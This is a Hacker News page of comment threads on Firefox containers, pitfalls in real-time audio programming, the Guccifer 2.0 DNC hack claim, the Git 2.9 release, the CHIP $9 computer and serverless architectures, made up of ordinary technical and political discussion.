I'm pretty happy with Chrome's support for multiple profiles in separate windows - for example I have one for work and one just for Facebook. I wonder why Firefox is using tabs? What other differences are there between these approaches?
35
enscr 1 day ago 2 replies      
Is it like the Chrome "People" (or profiles, or users) feature? Suggesting that "users won't need to use multiple browsers" addresses a problem that didn't exist if you used Chrome.
36
tener 1 day ago 0 replies      
Cool addition, but I can easily see how people will make costly mistakes by using a different account than intended.

I prefer to use different devices entirely.

When need arises to have multiple logins to the same page I simply open new private window.

37
hammock 1 day ago 1 reply      
So this is like profiles but tab-level instead of window level?
38
ComodoHacker 1 day ago 0 replies      
Funny side thought. Privacy movement has one additional benefit besides all others: it pushes machine learning research further and further.
39
digi_owl 1 day ago 0 replies      
Perhaps they should have called it something other than containers? Or is the term a buzzword these days for anything that separates A from B?
40
srrge 1 day ago 0 replies      
As a developer I see a lot of use for this feature.
41
nickysielicki 1 day ago 0 replies      
This so closely resembles the way that Qubes uses colors to identify your VMs [1] that I'm surprised they didn't get a mention in the post.

It's a really simple idea that can go a long way for digital identity hygiene. Can't wait to try it out.

---

[1] Screenshot of Qubes: https://www.qubes-os.org/attachment/wiki/QubesScreenshots/r2...

42
rolandukor 1 day ago 0 replies      
I think this is fantastic. In hindsight, it is a no-brainer. Good for Mozilla, and hoping the others will catch up.
43
neves 1 day ago 1 reply      
Great for paywalls that just allow me to read X articles. Now if I create 5 profiles on the site, I can read 5*X!
44
nikolay 1 day ago 0 replies      
Nice! Google Chrome has profiles, which are kinda similar, but this looks better!
45
ars 1 day ago 0 replies      
This reminds me of tabgroups for some reason - but they got rid of tabgroups.

I think this feature would have made tabgroups much more useful.

46
Nadya 1 day ago 2 replies      
I am always confused by the lack of user customization in features like this. Why am I limited to four containers? Why can't I rename them?

Four is not enough (personally, though I imagine it would be for most people) and remembering which identity is under "Work" and which is under "Shopping" is just an annoyance when none of my identities would be for "Work" or "Shopping". It would be faster and less annoying to sign out and sign in as another account. Being able to name my containers after my pseudonyms and have a container for each pseudonym would make it infinitely more useful and intuitive for me - rather than a mental burden not worth the hassle of using.

47
mtgx 1 day ago 2 replies      
If they're going to use per-tab containers, doesn't it make sense to have per-tab sandboxing as well, to ensure there's no data leakage?
48
nomi137 1 day ago 0 replies      
this will be awesome.. and watch out google chrome :)
49
mxuribe 1 day ago 0 replies      
Pretty cool!
50
darkroasted 1 day ago 0 replies      
This is really neat, although it does not look slick enough to replace my own hacky work-around:

What I have been doing is creating a separate Chrome application launcher for my different life contexts -- http://lifehacker.com/5611711/create-application-shortcuts-i... I have one for anonymous browsing, one for work, one for personal-real-name, and one for pseudonymous browsing. I renamed the application so I can launch by typing "WorkChrome" or "PersonalChrome" in spotlight search. Each Chrome app then runs with a separate profile, separate cookies, etc. I have a different icon and colored theme for each one, so that I never make a mistake with regards to which I am browsing in. I can have multiple open at the same time and tab switch between them.

51
ronjouch 1 day ago 2 replies      
@HN @dang why the post de-rename?

When submitting, I intentionally editorialized the title from something unclear out of mozilla's blog context ("Contextual Identities on the Web") to a more explicit title that speaks by itself ("Firefox 50 nightly new feature: Contextual Identities").

Isn't this considered valuable here?

52
janan11 1 day ago 0 replies      
This is genuinely super! I've already configured my Firefox so that FB exists only within a private context. This means I can visit any website which uses FB monitoring, and so forth, and I won't be logged in!
53
aestetix 1 day ago 1 reply      
Mozilla and Contextual Identities.... hmm.... did they just forget about Persona?
14
Four common mistakes in audio development atastypixel.com
401 points by bpierre  2 days ago   203 comments top 22
1
dmytroi 2 days ago 5 replies      
I really love time-restricted environments; in my opinion they truly liberate programmers: instead of using the language/library/tech/pattern/etc-of-choice they suddenly realize "oh, we don't have time for that". Do we need GC? We don't have time for that. Do we need to allocate memory? We don't have time for that. Can we maybe do this enterprise-like tens-of-thousands-of-source-files OOP hierarchy thing? We don't have time for that.

Realtime forces people to write less, writing only what actually matters, and all this in my opinion helps people be better engineers (in a way). I just wish it looked more attractive to people - hacking your way out in time/resource-constrained systems (like MCUs, for example) can be as fun as hacking html/js to make your site behave as you want.

2
splatcollision 2 days ago 1 reply      
Just reading the intro so far, not an audio developer particularly, but wanted to quote this:

> although there is a high horse present in this article, consider me standing beside it pointing at it, rather than sitting on top of it.

Something we can all aspire to!

3
iammyIP 2 days ago 7 replies      
These mistakes basically boil down to not using slow scripting languages and making the core buffer loop run fast and undisturbed. For realtime synthesis use C or C++, optimise early, use trigonometry approximations in the range -pi / pi, do not use lookup tables (they unnecessarily fill the cache; CPUs are fast enough), write the core loop branchless, write for cache, use vectorisation and function pointers. Do not use anything fancy; simple int32_t, float and vector/array is enough (some filters need double precision though). Do not copy stuff, point to it. Precalculate what can be precalculated, e.g. don't do x / samplerate, do x * samplerate_inverse. Check for denormals.
4
exDM69 2 days ago 4 replies      
> It can be helpful to know that, on all modern processors, you can safety assign a value to a int, double, float, bool, BOOL or pointer variable on one thread, and read it on a different thread without worrying about tearing

This is true on the CPU side (for some CPUs) but what about compiler optimizations?

Using "volatile" should make stores and loads happen where they are written in the code, but can it be relied on in multi threaded use cases? It's generally frowned upon for a good reason, but perhaps it's acceptable if you're targetting a limited range of CPUs (the article seems to be focused on iOS and ARM only).

A safer bet would be to use __atomic_load and __atomic_store (from [0] or [1]) or C11 atomics if you have the appropriate headers for your platform. They provide safe loads and stores for all CPU architectures, and provide the appropriate memory barriers for cache coherency (for architectures that do care).

[0] https://gcc.gnu.org/onlinedocs/gcc/_005f_005fatomic-Builtins...

[1] http://clang.llvm.org/docs/LanguageExtensions.html#langext-c...

5
radarsat1 2 days ago 2 replies      
Or just use FAUST: http://faudiostream.sf.net/

Seriously, check it out, it's awesome. Write your audio DSP in a language suited to it, compile to efficient C++ (among other languages) and optionally embed it in a (huge) variety of environments. (even Javascript for webaudio)

It's a functional description language that describes a DSP graph, and can generate block diagrams too. Not to mention, it has libraries containing any filter you can imagine. Highly recommended.

6
emiliobumachar 2 days ago 1 reply      
So, I assume none of those popular OS'es has priority inheritance[1].

Even though it's a concept from realtime computing, I though it would be widespread in general-purpose OS'es as well. Really, it seems like a useful feature for any OS that implements priority at all.

What would be the downsides of having it in a general-purpose OS?

The ones I can think of are development cost and processing overhead.

[1] https://en.wikipedia.org/wiki/Priority_inheritance

7
benwad 2 days ago 7 replies      
Since we seem to have a lot of audio programmers in here, does anyone have an opinion on using non-C/C++ languages for audio development? I've always used C/C++ but newer systems languages like Go and Rust (both have e.g. PortAudio support) seem quite well suited to the task.
8
aidos 2 days ago 2 replies      
> It can take just one glitch during a live performance for a musician to completely lose faith in their whole setup

I was an early adopter of digital vinyl (if you haven't seen it before, the records have a screechy signal that software can use to determine the position of the needle on the record, which it then maps to an audio file).

A friend of mine purchased the most popular unit at the time but it was really unreliable. It crashed once while a club full of people were dancing and that was the end of it for me. I switched to a unit by a small company (Serato) that had just been released (2004) and never looked back. The unit itself still works perfectly, there was a bug back in about 2008 that they tracked down and patched for me.

Apparently the original brand has now caught up technology-wise and they're a big player, but I will never, ever, ever buy their kit. Reliability issues with audio gear can completely destroy your trust.

9
sehugg 1 day ago 0 replies      
It kills me that it's 2016 and pulseaudio stutters when I move a window (at least on my system).
10
bartl 2 days ago 7 replies      
I'm a bit amazed he doesn't even mention [double buffering](https://en.wikipedia.org/wiki/Multiple_buffering), a system that was already used in old video games to avoid flicker, as a way to draw scenes off-screen and only pass them on to the video stage once the scene is complete.

All you would need here is 2 (or more) copies of the shared data structure and a few pointers to the data structure. You fill in a draft version of the data structure and only change the "read" pointer to point to it when it's ready. Changing that pointer is, I would hope, atomic. You can then change the "write" pointer to point to a different copy of the data structure to work on.

To make sure the client only reads consistent data, it can make a copy of that pointer before it starts processing, because the pointer itself might change.

If you use 3 buffers instead of 2, and you're sure the processing of a buffer takes less time than the switching cycle time, you can be sure your buffer data will not ever change in the meantime.

11
ukyrgf 2 days ago 1 reply      
I wasn't even aware I WAS living in a "post-Audiobus/IAA world". So these are... iPhone apps?
12
delinka 2 days ago 1 reply      
"Dont use Objective-C/Swift on the audio thread."

Nothing wrong with using Swift (the language) to render audio in realtime on the audio thread. I'd change the advice above to: don't send messages to Objective-C objects during your audio thread.

13
bwindels 2 days ago 3 replies      
Great article. Interesting that modifying and reading word-sized values is an atomic operation on ARM. IIRC on x86 this is not the case, because values can be cached in the caches of the different CPU cores, and thus be out of sync. Does someone have a more detailed insight into this?
14
fenomas 2 days ago 2 replies      
> Any app that does audio has at least two threads of execution: the main thread, and the audio thread

As a side note, I sure wish browsers would hurry up and implement web audio workers so that this could be true for me!

15
camperman 2 days ago 1 reply      
I remember using a circular buffer for a MOD/S3M player I wrote many moons ago. I think you called a hardware interrupt to enable the Gravis or Soundblaster to read from a block of memory and send it out to the speakers at the right frequency, and then made sure that you fed enough data into the buffer. It wasn't even concurrent - every loop, just mix enough of the track to fill the buffer and write it. Simpler days...
16
cageface 2 days ago 0 replies      
I spent the better part of the last few years working on my own audio apps. It's definitely the most difficult programming domain I've worked in. Real time requirements + threading + low level code makes for a very challenging environment. But it's also a lot of fun. Using the tools the author describes here can save you a lot of headaches and let you focus more on the fun part though.
17
amelius 2 days ago 4 replies      
> If it doesnt, the buffer runs dry, and the user hears a nasty glitch or crackle: thats the hard transition from audio, to silence.

It would be awesome if we could prevent this crackle somehow on a lower level of abstraction. What I mean by that is that if the buffer runs dry, the hardware (or the OS/audio driver) could do some prediction in order to bridge any gaps in the audio more nicely.

18
JoeAltmaier 2 days ago 1 reply      
Another common mistake: off-by-one error. Even a single zero or duplicate sample value is clearly audible! It's amazing how sensitive we are to audio artifacts.
20
zongitsrinzler 2 days ago 0 replies      
What song is in the 4-sec sound clip? Sounds so familiar, like something from Daft Punk.
21
gradinafrica 2 days ago 0 replies      
The Firefly references in this article are on point.
22
tantalor 2 days ago 0 replies      
This is also true of animation threads.
15
Guccifer 2.0: DNC's servers hacked by a lone hacker guccifer2.wordpress.com
462 points by r721  2 days ago   158 comments top 25
1
Jerry2 2 days ago 10 replies      
The media (and CrowdStrike) blame Russians for it [0]. Heh... yet this blog, and the hacker himself, say he did it alone. I guess it's easier to forgive incompetence if you blame the attack on some huge, powerful, resourceful, state-funded opponent. That's why every hacking report of some big organization or company today lays the blame on APTs, China, Russia, NORKs and so on.

Management is off the hook since they don't have to admit that they were hacked by some kid and the security company gets the prestige of 'fighting and outsmarting a state actor'. And everyone's job is more or less safe. Other companies and CIO/CSOs now know that 'Sec Company X' will cover their ass by shifting the blame on some huge entity. Company lawyers are also happy because the liability of such attacks will be less. And the cycle continues. Guccifer, for example, didn't even know how to program and he used his phone to hack [1].

Yes, APTs definitely do happen but I'd bet they happen a lot less frequently than the media and security companies would want us to believe.

[0] https://www.washingtonpost.com/world/national-security/russi...

[1] https://en.wikipedia.org/wiki/Guccifer#Computer_hacking_acti...

2
tptacek 2 days ago 1 reply      
I will reprise a comment from yesterday:

The only thing interesting about this story is that whoever did it "got caught". Sort of. Maybe.

Is there anyone here who really believes that every major campaign organization since, say, 2004 hasn't been completely owned up? What, you think the people that build the software and IT environments for campaigns --- sites that by design have millions of users with persistent accounts, and thousands of staff members at varying levels of privilege --- are the crème de la crème of software security talent?

Because, sure, I mean, everyone I know in software security and pentesting tells me "my first career choice is to go work in IT for the DNC and the GOP", but somehow along the way Google manages after a mighty struggle to outbid the 70k/year cost-center IT organizations offer for security talent.

If there was any interesting "oppo research" on McCain in the DNC servers during the '08 election, I will bet all the money in my pocket versus all the money in yours that the Chinese read all of it long before everyone on the official CC list did.

https://news.ycombinator.com/item?id=11903136

3
yanilkr 2 days ago 2 replies      
If Guccifer 2.0 writes a blog about "My first 10 minutes on a server" It would be a great read and we would know he reads hacker news.
4
SlipperySlope 2 days ago 3 replies      
I read the convincing CrowdStrike detailed and technical description of how the DNC server got hacked. CrowdStrike saw the tracks of two known Russian groups.

The published documents to me look real. The SECRET document from the State Department had the obviously secret item that the USA will not nuke terrorist training camps nor hideouts in Pakistan. Official US policy is that all tools are on the table.

Question is how did the SECRET document get on to the DNC server?

Regarding Guccifer 2.0, I believe this is Russia's obfuscation of their release of these damaging documents. They want to help Trump, but must not admit it for fear that Obama takes action now, Hillary takes action if she is elected, or even if Trump wins - Russians helping him might actually hurt him given the foreign interference in USA elections.

5
rhema 2 days ago 1 reply      
Seems like the DNC does not have a great track record on computer security. The Sanders campaign filed suit on the DNC. Both Sanders and Clinton may have been able to access each others files.

According to CNN, Wasserman Schultz said:"[The Sanders staff] not only viewed it, but they exported it and they downloaded it... We don't know the depth of what they actually viewed and downloaded. We have to make sure that they did not manipulate the information... That is just like if you walked into someone's home when the door was unlocked and took things that don't belong to you in order to use them for your own benefit. That's inappropriate. Unacceptable."

Maybe you shouldn't leave your front door open.

[1] http://www.cnn.com/2015/12/18/politics/bernie-sanders-campai... .

6
0xCMP 2 days ago 1 reply      
If/when wikileaks begins to talk then we'll know if it was a legit leak.

The docs listed aren't the full dump, just "proof" that there is more.

7
dinger 2 days ago 1 reply      
Very interesting thread about this here: https://twitter.com/pwnallthethings/status/74317975006403788...

Looks like it may still be Russia

8
exabrial 1 day ago 0 replies      
2016: Giant meteor hitting the Trump vs Hillary debate and wiping out them and their fervent supporters is our only chance of surviving.
9
chollida1 2 days ago 0 replies      
Did they just out Jim Simons of Renaissance Technologies as donating $5,000,000 to the democrats?

Robert Mercer won't be happy:)

https://www.opensecrets.org/news/2016/06/a-hedge-fund-house-...

David Shaw of D.E. Shaw fame is there as well.

10
supergirl 2 days ago 2 replies      
The media made it sound all but official that Russia hacked them. Of course, no one ever publishes any proof for these sorts of claims.
11
dpweb 2 days ago 2 replies      
That playbook is weak. Real research would be a lot more explosive than that.

How could one prove it? Describe the hack in detail in a message and sign it with a key?

12
soared 2 days ago 3 replies      
The x.wordpress.com domain made me smile; is there a history of hackers using one-off free/hosted blogs for releases like this? It goes against every one of my marketing bones, but it is so damn cool.
13
235337 2 days ago 0 replies      
I love how easy attribution is nowadays! They use multiple Virtual Machines and English and Russian fonts, must be Russian.

I also love how both sides instantly blamed the other.

Obviously trump hacked the DNC and then released its oppo research (on him) to hurt Hillary. Either they removed all the bad stuff, or wanted to release it all at once and force the attribution to Hillary.

or

Obviously Hillary Hacked the DNC and released the oppo research on trump to cause an easy document dump and get media attention on all her weak oppo research

No Expert's Opinion or Confirmation Bias going on today.

Edit: It is totally possible some extra "secret" attribution is going on by bigger entities.

14
duiker101 1 day ago 2 replies      
I am sorry if this is a stupid question, but why does anyone care if it's Russia, China or a lone US hacker? What's the point of discussing that over the content of these documents?
15
ghshephard 1 day ago 0 replies      
These documents are 8+ years old. The National Security document is from 2008. It talks about reversing a bunch of Bush doctrine and repealing don't ask/don't tell, and is focused on Obama's first 100 days, not Hillary.
16
yepnopemaybe 1 day ago 1 reply      
Among the files made public is one named big-donors-list/

Under a tab named "Not Met With" and a heading called "Obama Billionaires" appears the name Charles Koch.

Obviously, this may indicate that Koch raised funds for Obama in some capacity and that Clinton would like to reprise that relationship. Obviously, that makes no sense.

17
vmp 1 day ago 0 replies      
OT: HN posts are starting to resemble "fake news" in the game Uplink. [1] :)

[1] http://i.imgur.com/FeFPcwj.png

18
callesgg 1 day ago 1 reply      
Stuff is always hacked by one person. Whether that person works for some sort of organization does not really alter the "hack".
19
jjawssd 2 days ago 0 replies      
Guccifer 2.0 is a psyop pumped by the DNC
21
pbreit 1 day ago 0 replies      
So is there anything interesting here?
22
21 2 days ago 6 replies      
Another interesting theory: The Trump campaign alleges that the DNC hacked itself

https://twitter.com/JTSantucci/status/743194156739108865/pho...

23
poozer305 2 days ago 1 reply      
"Guccifer may have been the first one who penetrated Hillary Clinton ... but he certainly wasn't the last."
24
SixSigma 1 day ago 0 replies      
False flag to offset the email server lies.
25
mungoid 1 day ago 0 replies      
Russia does not have America's best intrest in mind so if they did secretly do this to help Trump, that's more of a reason to NOT vote for him
16
Git 2.9 released github.com
351 points by bootload  1 day ago   77 comments top 14
1
neogenix 1 day ago 5 replies      
"In 2.9, Git's diff engine learned a new heuristic: it tries to keep hunk boundaries at blank lines, shifting the hunk "up" whenever the bottom of the hunk matches the bottom of the preceding context, until we hit a blank line. "

I like the new diff improvements
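 
(In 2.9 the heuristic is experimental and off by default; if I remember the release notes correctly you opt in as below, but verify the names against `git help diff` for your version:)
 
 git config --global diff.compactionHeuristic true
 git diff --compaction-heuristic   # or per invocation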

2
Spiritus 1 day ago 1 reply      
Bitbucket[1] also mentions a few other new cool stuff in 2.9, like making the `--verbose` flag to `git commit` default:

 git config --global commit.verbose true
[1] https://blog.bitbucket.org/2016/06/13/git-2-9/

3
icefox 1 day ago 2 replies      
Hidden at the end of the changelog is the addition of the new config entry "core.hooksPath", which lets you specify globally or per repository where hooks should point to.

In the Git-hooks project we have been using the init.templatedir which this replaces (as it is better), but for those that can't upgrade to 2.9 you can use init.templatedir and some variation of what Git-Hooks does to obtain similar results.

https://github.com/icefox/git-hooks/blob/master/git-hooks#L1...
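 
(A quick sketch of using the new entry; the directory names here are arbitrary:)
 
 git config --global core.hooksPath ~/.git-hooks   # globally
 git config core.hooksPath .githooks               # or per repository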

4
exDM69 1 day ago 1 reply      
The new "rebase -x" seems really useful. It runs a test script on all patches in the history, making it useful for getting a bunch of patches tested for merging at once.

This makes it easier to not have broken commits (e.g. ones that don't build) in master, which in turn makes git bisect more useful.
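 
(For example, with whatever test command your project actually uses:)
 
 # re-run the test suite on every commit being rebased onto origin/master:
 git rebase -x "make test" origin/master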

5
hkjgkjy 1 day ago 4 replies      
OT

The new diff script (https://github.com/git/git/blob/master/contrib/diff-highligh...) is juicy indeed.

It is written in Perl. The Perl interpreter is available on most UNIX systems, so that's handy. I wonder if there is any Lisp-like language that is as common, that you can write scripts and expect them to run on most systems. Would be nice since Lisp languages have very few concepts to learn...

6
cpdean 1 day ago 1 reply      
'git' is the name of the command line interface. the VCS is technically called "git's monster"
7
fidz 1 day ago 0 replies      
What is the algorithm of the heuristic diff? Is it comparing longest matches?

 So, if I originally have

  x
  b
  n

 then adding x-a-n on top of it, it will become

  x
  a
  n
  x
  b
  n

How can I know that I added x-a-n? Basically, isn't it comparing x-b-n and detecting that it has changes on the 'b' block, so the 'b' block becomes a-n-x-b?

Edit: My bad, didn't see this https://news.ycombinator.com/item?id=11915351. It has been explained there.

8
mr_sturd 1 day ago 1 reply      
> Faster and more flexible submodules

I have a big, monolithic repository which I'm looking to break up in a migration to Git.

If I run;

 git submodule split -P <path_to_sm> -b <name_of_branch> --jobs=4
Will I see the same improvements, as documented?
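 
(One caveat, as far as I know: there is no `git submodule split`; extracting a subdirectory's history is the job of the contrib `git subtree` tool, while 2.9's parallelism applies to fetching/updating submodules. A sketch, with flag names worth double-checking for your git version:)
 
 git subtree split -P <path_to_sm> -b <name_of_branch>   # extract a subdirectory into its own branch
 git submodule update --init --jobs 4                    # parallel submodule fetching is a separate feature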

9
rplnt 1 day ago 1 reply      
I haven't been following releases for a while, it's nice to see that submodules can now (2.8) be actually used.

Just curious, were there any changes to sparse-checkout? It had abysmal performance in pre-2.x if you threw more elaborate paths at it, or more paths in general.
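 
(For reference, the classic manual setup in this era of Git looks roughly like this; the path is a placeholder:)
 
 git config core.sparseCheckout true
 echo "some/dir/" >> .git/info/sparse-checkout
 git read-tree -mu HEAD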

10
systemz 1 day ago 1 reply      
Are they planning to simplify the standard day-to-day commands from a flag nightmare to something that a mortal can actually remember?
11
nilsjuenemann 1 day ago 2 replies      
Is there already a pre-built package for MacOSX?
12
msoad 1 day ago 0 replies      
Oh I should compare the new coloring with DiffSoFancy. I think DiffSoFancy still wins!
13
desireco42 1 day ago 3 replies      
Great release. Submodules are a bad practice riddled with problems; I think it wouldn't be bad to remove the feature altogether, so that no one will have the option to use it.
14
rco8786 1 day ago 2 replies      
Over/under until git supports emoji in commit messages?
17
CHIP $9 Computer getchip.com
366 points by unusximmortalis  2 days ago   212 comments top 32
1
Aissen 2 days ago 8 replies      
More like the $15.22 computer with shipping. And said shipping cost is hidden at the third stage of ordering, well after you've given your email (hello dark pattern).

At least the $6.22 shipping cost to my European country is reasonable and the same for two CHIPs (3: $7, 4: $9, 5: $11). I recall it was much higher during the kickstarter (and they worked to reduce it, as it seems on the campaign page).

Edit: PocketCHIP shipping is $11

2
codemonkeymike 2 days ago 4 replies      
Being (or attempting to be) the "low cost leader" really brings out the worst people in the comments: people who complain about shipping, and packaging, and the price on other sites, and the price of other products, on and on and on. You couldn't pay me to be in such a market. I feel bad for those who provide a cheap service or product and then get the worst feedback one could get.
3
SloopJon 2 days ago 3 replies      
Can't remember whether I've seen this before. A few details after reading through some of the docs:

 * powered by Allwinner R8 (ARM Cortex-A8) with some proprietary bits
 * Debian-based CHIP O/S preinstalled on 4 GB flash
 * one micro USB port for power (supports USB OTG if powered by battery)
 * power connector for battery
 * one USB 2.0 port
 * one TRRS port for audio and composite video
 * built-in WiFi and Bluetooth
 * VGA adapter available for $10
 * HDMI adapter available for $15 (no audio)
 * case available for $2

4
donquichotte 2 days ago 2 replies      
It's interesting that they distribute the "CHIP Flasher" as a Chrome app. It seems very user friendly but somewhat opaque. And it's a pity there's not much info on the hardware.

Anyway, I've ordered two pieces. They're probably going to gather dust alongside my Raspberry Pis and Arduinos once the initial excitement has worn off. :)

[EDIT] OK there's lots of info on the hardware, just not easy to find on their sales page: https://github.com/NextThingCo/CHIP-Hardware/

5
pmorici 2 days ago 5 replies      
I'm having a hard time finding a reason why I would buy this over the Raspberry Pi. Like others have said, for this to be useful as a general purpose computer you need to buy add-on boards for video. Compare that to the RPi Zero, which is $5 and includes an HDMI port. You can easily add a USB ethernet or wifi adapter to the Zero for under $4 and have a real $9 computer.

Not to mention the CHIP uses an AllWinner processor which has a record of not playing well with open source and a history of security issues.

6
thom_nic 2 days ago 0 replies      
I was an early Kickstarter backer and got mine right around the beginning of 2016. For me the sweet spot was small size, and WiFi. Note this was before The RPi3 was announced with onboard Wifi. CHIP had an early issue with flash corruption (no surprise there are always some issues with v1 hardware) but seem to have that sorted out with a firmware fix and mine has been running without issue for weeks.

Compared to the original RPi which required an $11 WiFi USB dongle and a powered USB hub this is a lot simpler. I primarily used it as a headless sensor node or wireless/networked LCD display. It's perfect for that and still one of the lower-cost options even after shipping $$.

Their documentation (http://docs.getchip.com/) and forum are actually pretty great. I think this will be a good contender if/ when they reach general availability.

7
mavci 2 days ago 4 replies      
Why does the HDMI adapter cost $15? It's like creating a piece of hardware, splitting off the expensive parts, and selling the base at a low price as marketing. It's not a $9 computer; it's actually ~$35.
8
SwellJoe 2 days ago 1 reply      
I've been waiting for the PocketCHIP to become reality before ordering anything. It looks like they're planning to ship this month, so it might be time to order.

I love that it includes a game dev kit that includes a music tracker...that's what I want it for. I have an original GameBoy for making music with LSDJ, and it's a lot of fun. But, it is difficult to find good condition GameBoys for anything approaching a reasonable price these days. I'd love to have something a bit more modern with the same basic feel and sound.

The PocketCHIP has the advantage of having a "real" computer inside and a QWERTY keyboard, so if I get bored with four note polyphony, I could run something like SchismTracker or SunVox or whatever. It is in the sweet spot for me for this kind of device, in a way that the Raspberry Pi hasn't been (though the Pi is cool, too).

9
pi-rat 2 days ago 1 reply      
Still waiting for the CHIPs I ordered several months ago :/
10
codezero 2 days ago 1 reply      
I'm stoked for the PocketCHIP.
11
Illniyar 2 days ago 1 reply      
The chip has been on HN on and off for months. Is there something new happening?
12
jetskindo 2 days ago 1 reply      
This is amazing. Just need to figure out how I can attach a battery to it and everything in my house will be a computer.
13
MistahKoala 2 days ago 0 replies      
Would be helpful if they were more transparent about shipping. I'm not going to go through the motions of pre-ordering just to find out what the total costs are.
14
jokoon 2 days ago 4 replies      
I'd prefer such a product if I could just power it and control it over SSH. I don't really need an actual screen plug, as I wouldn't use a home screen on such a tiny thing: it doesn't make sense.

Although the Raspberry Pi Zero seems interesting, I don't know if I can plug a minimalist, small and cheap screen into a mini-HDMI. Overall there is no point using a classic screen on such tiny devices.

This seems to compete with the Raspberry Pi Zero, and the RPi Zero doesn't have wifi.

15
newman314 2 days ago 1 reply      
I bought one for June delivery, hopefully it shows up.

What bums me out is that there is no board I can easily find of the (CHIP, Pi Zero) ilk that comes with an ethernet port. I know I can get a regular Pi, but it's too much for my use case.

On a related note, I've been looking for a low cost smart power plug with ethernet (10/100/1000) without much success. If anyone knows of such a beast, please let me know.

IMO, $80 for something like this https://www.amazon.com/ezOutlet-Internet-IP-Enabled-Android-... is too much

16
manmal 2 days ago 0 replies      
Did they really use a banana for scale?
17
znpy 2 days ago 1 reply      
I made a group order for 40 CHIP computers. I was definitely pissed off by the fact that I could only order five of them at a time (but there was no limit on the number of orders I could place).

I am looking forward to them starting to deliver.

I hope that VAT won't be too high.

18
lil1729 2 days ago 1 reply      
I still can't see a full spec for the SoC. Without that, to me, this is uninteresting. Sorry. Perhaps others have different priorities. Having a fully hackable $9 computer would have been a wonderful thing to me.
19
matthewaveryusa 2 days ago 0 replies      
Does anyone know if one of the USB slots can act as a client while the other as a host? I can't seem to find any documentation with that level of detail.

edit: looks like one of them can run in OTG mode (i.e client), that's wonderful!

20
tmaly 2 days ago 0 replies      
I ordered a CHIP over a year ago with the VGA adapter. I think it should be shipping soon. I sort of now wish I had gone with the HDMI adapter, as I do not have too many VGA systems these days.
21
tluyben2 2 days ago 1 reply      
Anyone know what that vertical-scrolling shmup is in the image above the gaming header?
22
zhte415 2 days ago 1 reply      
A big market for these that doesn't seem to be mentioned is the potential for business presentation use: sales, training, basically anything in an office.

Why carry a laptop when the location you're going to has a projector screen you'll use, likely has a keyboard (or you can carry a portable input device), and a power supply? And your files are cached on your favourite cloud.

Make a nice looking case for these, and they're impressive novelties, lighter than the lightest laptop, and probably a bit more stable than driving a projector from a phone.

23
vegabook 2 days ago 0 replies      
CHIP's $9 pitch is nothing special anymore, with that Rpi device for $5 now, but the PocketCHIP wrapper is still a strong USP. Here is an IoT device where you don't need a soldering iron to actually get basic, useful stuff going.
24
dboreham 2 days ago 0 replies      
I ordered these the day they announced. Not sure if mine have shipped yet. Excited to see them.
25
LandoCalrissian 2 days ago 0 replies      
I ordered mine in November, when are they actually planning on shipping?
26
LeonidBugaev 2 days ago 1 reply      
Can I start using CHIP without a display? Like ssh access when connected to USB or via Bluetooth?
27
durpleDrank 2 days ago 0 replies      
Do they keep costs down because they are using conflict minerals? http://enoughproject.org/special-topics/progress-and-challen...
28
rbanffy 2 days ago 0 replies      
It's a bit frustrating there is no easy way to change the shipping address after the preorder.
29
ruffrey 2 days ago 0 replies      
I ordered one. With tax and shipping to Northern California, it was over $16.
30
mvdanj 2 days ago 0 replies      
Is it shipping soon?
31
avodonosov 2 days ago 0 replies      
where to get time to play with all the toys....
32
Annatar 2 days ago 2 replies      
Impressive hardware, but UGH!, not yet-another-Linux powered computer! If I had the time, I'd port illumos to it myself, but since I don't, Linux on this thing makes it a non-starter for me.
18
Serverless Architectures martinfowler.com
363 points by nu2ycombinator  20 hours ago   132 comments top 29
1
stickfigure 13 hours ago 4 replies      
By this definition, we've been running "serverless" on Google App Engine for most of a decade.

* We don't monitor how many instances are running and don't really care. Our "functions" are http endpoints. GAE spins up or down instances to meet the load. Our interface with "instances" is just the size of the bill at the end of the month.

* Async task processing is also just an http endpoint function. We even have a little bit of syntactic sugar so it looks like we're just adding functions to a queue.

* We have no ops or devops staff. We just deploy code that implements functions (http endpoints).

* Persistence is also scaled by Google; there's no database server, just an API to read/write data that scales infinitely (or at least scales linearly with our bill, not limited by the dataset).

It sounds to me like the article is trying to distinguish between "serverless" and PaaS by describing PaaS done poorly. For the longest time, GAE didn't even expose the # of instances servicing your app. They've exposed a lot more of the underlying constructs since, but you can still ignore them unless you're trying to hyperoptimize your bill.

2
loup-vaillant 16 hours ago 1 reply      
What kind of evil genius devised a term that suggests peer-to-peer, to describe something that relies more than ever before on central services and authorities?

It feels like "intellectual property" all over again which suggests the rules used for rival goods can be used for ideas, hence ignoring the difference between moving and copying.

3
mikegerwitz 15 hours ago 3 replies      
There are a number of things I find alarming about this (which is nothing new):

Firstly, the author is encouraging the conversion of traditional web pages to single-page web applications, which means that users would now have to download actual software to use the website rather than using the software that they already have and trust: their web browser.

Perhaps most alarming is the acknowledgement of this:

> One of the main benefits of Serverless FaaS applications is transparent production runtime provisioning, and so open source is not currently as relevant in this world as it is for, say, Docker and containers.

This highlights the major issue of SaaSS/SaaS, and FaaS takes it to the extreme:

https://www.gnu.org/philosophy/who-does-that-server-really-s...

Not only does the user not have control (as in the case of SaaS), but in the case of FaaS, the actual author is relinquishing the same control.

These suggestions all "make sense" from an architectural perspective (depending on who you ask, and depending on the software being written). But I plead for others to consider whether this is necessary in their particular instance; it's the default thinking nowadays: want to write a program? Want a wide audience? Want it to scale? Put it on the Web, make it a service, store it and all user data on someone else's computer, and call it "the cloud".

I expressed my opinions and concerns at LibrePlanet 2016:

https://media.libreplanet.org/u/libreplanet/collection/resto...

4
infodroid 18 hours ago 2 replies      
It is misleading that the HN title suggests the author is Martin Fowler, but this is not the case for this guest article. The actual author is Mike Roberts, the article is hosted on Fowler's site.
5
gmazza 17 hours ago 4 replies      
Serverless = new name for PaaS.

VPS (virtual private servers) were available (and largely ignored) for quite a while before 2006, when AWS came along with the catchy word "cloud". This single word changed everything. The same technology all of a sudden became cool, and everybody started using it.

Maybe now it is the turn of PaaS [1] - call it "serverless" and folks will finally start seeing all the benefits (true scalability, efficient resource utilization, timely and painless software upgrades, etc.)?

[1] https://en.wikipedia.org/wiki/Platform_as_a_service

6
Spearchucker 18 hours ago 4 replies      
The API gateway made me smile. In the 90's we had message queues. In the 00's we had service buses. Today we have API gateways. All they do is route requests - they're all the same thing.

There's merit in serverless, no doubt. There are many things that worry me. Not owning the infrastructure means I don't get the telemetry I'd like, making triage difficult. Direct access to the database is a good idea said nobody ever. And at what point does my own infrastructure become more cost-effective than cloud?

